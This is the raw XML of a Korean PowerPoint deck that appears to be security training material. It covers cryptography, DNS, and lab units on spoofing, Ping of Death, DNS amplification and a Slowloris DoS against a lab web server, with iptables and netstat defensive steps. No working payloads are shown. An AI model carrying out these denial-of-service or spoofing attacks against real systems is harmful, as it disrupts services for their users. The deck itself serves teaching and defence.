            <a:ext cx="5400675" cy="323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67970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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>10.10.1.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 웹페이지 접속 시도 시 접속 불가</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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47860760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72ABFF5-7366-4F3A-9D09-C0CF0485C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8848"/>
            <a:ext cx="5400675" cy="3911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47860440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD29B156-1DFE-4589-BD6F-F7FF5BA3B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9088" y="938784"/>
            <a:ext cx="39084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46147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80" y="409625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3073" name="_x247863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9807132F-769D-4F8D-A491-7B45DF7F714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9491"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500181" y="906487"/>
            <a:ext cx="5400674" cy="2104611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="화살표: 오른쪽 14">
            <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00733412-9AE5-4585-8405-12AC612CE9B3}"/>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3611964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/Training/Unit/Net/15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 15. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Slowloris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아파치 웹 서버가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Slowloris DoS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받아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정상적인 서비스가 불가능한 상황이다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Slowloris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90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9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Slowloris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Attacker(Kali linux / 10.10.1.166)</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Victim(CentOS 6.4 / 10.10.1.101)</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A945EE6F-447F-47A7-A88B-6A750291CB2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706312"/>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공격이 들어오는지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</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웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a: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localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 시도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iptable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -A INPUT -s 10.10.1.166 -j DROP</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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 접속</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47859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE161DF9-0C62-4686-BEA6-25938C696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877824"/>
            <a:ext cx="5400675" cy="3208338"/>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47859320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE5AE86-8F64-44A8-A218-223DBDBA1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 y="4594988"/>
            <a:ext cx="4427538" cy="1363663"/>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47859160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A90F5E-D397-4FBF-9094-6E6818917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55957"/>
            <a:ext cx="54006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47859080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639FEAE2-9ACB-496E-BD5C-22BE5EA42C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5936" y="3090672"/>
            <a:ext cx="4694238" cy="198438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4105" name="_x247859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCFC429-5F60-4825-836F-B8069AE327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7832" y="3840480"/>
            <a:ext cx="5400675"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15220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47860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BD1F33-A6EF-4486-B103-18677A276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980" y="719328"/>
            <a:ext cx="2522538"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71124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8301193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959778"/>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73967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/Training/Unit/Web/3</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파일 다운로드에 대한 취약한 서버를 확인 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웹서버의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다운로드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게시물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Guest board/r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취약점 공격을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>대응</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할 수 있다</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804697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8199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8723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199181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/Environ/WSLOfflinePackageInstall</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  WSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>패키지 오프라인 설치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(bgpdump)</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http://archive.ubuntu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>원하는 패키지를 다운받는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>본 예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 이동하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump_1.6.0-2_amd64.deb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 다운로드한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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우분투에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패키지를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드한 경로에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용하여 들어간다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다음 명령어를 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 설치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bgpdump_1.6.0-2_amd64.deb </a:t>
            </a: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4. bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 쳐서 잘 설치되었는지 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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5"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44E85FC0-5988-40D3-8C94-2A8E8FB1FE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1" r="339" b="23775"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="2960670"/>
            <a:ext cx="5214695" cy="3300981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D2DB8D-0520-4571-9BA4-79C619B56012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6654260" y="2295367"/>
            <a:ext cx="4467849" cy="1133633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991284A-478D-4947-B442-937A0ED203C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect r="34208" b="14939"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349714" y="3585040"/>
            <a:ext cx="5283534" cy="178269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D746132-1C59-4018-A365-FDC5875DB994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262754" y="4506005"/>
            <a:ext cx="5457453" cy="780494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="그림 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB67231E-263B-4912-970C-EA6E9A018E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262754" y="5800703"/>
            <a:ext cx="5282272" cy="575147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2224242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689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129392717"/>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12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>증폭 공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(DNS Amplification)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7"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Slowloris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51869</TotalTime>
  <Words>34450</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>7960</Paragraphs>
  <Slides>433</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433</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="456" baseType="lpstr">
      <vt:lpstr>Apple SD Gothic Neo</vt:lpstr>
      <vt:lpstr>AppleSDGothicNeo</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>HY중고딕</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>Noto Sans KR</vt:lpstr>
      <vt:lpstr>Spoqa Han Sans</vt:lpstr>
      <vt:lpstr>돋움</vt:lpstr>
      <vt:lpstr>돋움, dotum, Helvetica, sans-serif</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>바탕</vt:lpstr>
      <vt:lpstr>한컴바탕</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>휴먼명조</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Raleway</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/Environ/WSL2(command)  WSL2 command 설치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/Environ/WSLOfflinePackageInstall   WSL 패키지 오프라인 설치(bgpdump)</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대칭키 vs 비대칭키</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – 대칭키 vs 비대칭키</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 실습 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA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/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</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양수</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 - 진수</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14  음수의 표현</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/Theory/T16   네트워크 구조 추적</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고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/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)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/Training/Unit/Net/9  9. ARP Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/9  9. ARP Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/11  11. DNS Spoofing</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/Training/Unit/Net/11  11. DNS Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death</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/Training/Unit/Net/14  14. DDOS – DNS Amplification</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/Training/Unit/Net/15  15. DDOS - Slowloris</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/Training/Unit/Web/3  2. 취약점 직접 객체 참조</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도우</cp:lastModifiedBy>
  <cp:revision>791</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-27T21:56:40Z</dcterms:modified>
</cp:coreProperties>
</file>